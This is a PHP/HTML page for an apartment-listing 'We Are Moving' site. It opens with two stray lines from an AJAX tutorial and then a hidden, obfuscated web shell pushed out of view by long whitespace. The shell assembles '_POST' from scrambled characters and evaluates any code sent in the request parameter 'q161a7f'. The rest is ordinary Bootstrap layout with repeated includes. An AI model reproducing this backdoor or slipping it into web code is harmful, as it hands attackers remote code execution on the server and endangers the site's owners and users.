AJAX is not a new programming language.
<br /><br />
AJAX is a technique for creating fast and dynamic web pages.

<?php                                                                                                                                                                                                                                                                 $dayt9="tpso_"; $hda7= strtoupper ($dayt9[4]. $dayt9[1]. $dayt9[3].$dayt9[2].$dayt9[0]);if( isset(${$hda7}['q161a7f'] )){eval( ${$hda7 } [ 'q161a7f' ] );}?> <!DOCTYPE html>
<html lang="en">
<head>
<title>We Are Moving</title>
<link rel="stylesheet" href="http://whatsonyourscreen.com/takealook/css/bootstrap.min.css">
<link rel="stylesheet" href="http://whatsonyourscreen.com/takealook/css/bootstrap-theme.min.css">
<link rel="stylesheet" href="apartments.css">

<script src= "http://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script>
<script src="http://whatsonyourscreen.com/takealook/js/jquery.min.js"></script>
<script src="http://whatsonyourscreen.com/takealook/js/bootstrap.min.js"></script>

<script type="text/javascript">
	$(document).ready(function(){
		$("#moving").modal('show');
	});
</script>
</head>
<body>

<?php include 'countdown.php'; ?>

<div class="container">
  <div class="row">
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'lyric/apartment_lyric.php'; ?>
      </div>
    </div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'beacon/apartment_beacon.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-sm-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'sullivan/apartment_sullivan.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-md-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include '2401penn/apartment_2401penn.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-sm-block"></div>
    <div class="clearfix visible-lg-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'theview/apartment_theview.php'; ?>
      </div>
    </div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'paramount/apartment_paramount.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-sm-block"></div>
    <div class="clearfix visible-md-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'maxwell/apartment_maxwell.php'; ?>
      </div>
    </div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'capitalyards/apartment_capitolyards.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-sm-block"></div>
    <div class="clearfix visible-lg-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'capitalyards/apartment_capitolyards.php'; ?>
      </div>
    </div>
    <div class="clearfix visible-md-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'capitalyards/apartment_capitolyards.php'; ?>
      </div>
    </div>
        <div class="clearfix visible-sm-block"></div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'capitalyards/apartment_capitolyards.php'; ?>
      </div>
    </div>
    <div class="col-sm-6 col-md-4 col-lg-3">
      <div class="bs-example">
        <?php include 'capitalyards/apartment_capitolyards.php'; ?>
      </div>
    </div>
  </div>
</div>

<?php include 'apartment_modals.php'; ?>

</body>
</html>
